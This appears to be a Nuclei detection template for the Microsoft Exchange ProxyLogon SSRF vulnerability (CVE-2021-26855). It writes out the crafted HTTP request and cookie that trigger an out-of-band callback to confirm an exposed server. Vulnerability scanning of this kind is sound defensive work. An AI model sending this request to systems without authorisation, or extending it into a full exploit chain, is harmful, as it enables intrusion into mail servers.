id: CVE-2021-26855 info: name: Exchange Server SSRF Vulnerability author: madrobot severity: critical description: | Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078. tags: cve,cve2021,ssrf,rce,exchange,oast,microsoft reference: - https://proxylogon.com/#timeline - https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse - https://www.shodan.io/search?query=vuln%3ACVE-2021-26855 - https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2021-26855 requests: - raw: - | GET /owa/auth/x.js HTTP/1.1 Host: {{Hostname}} Cookie: X-AnonResource=true; X-AnonResource-Backend={{interactsh-url}}/ecp/default.flt?~3; matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http"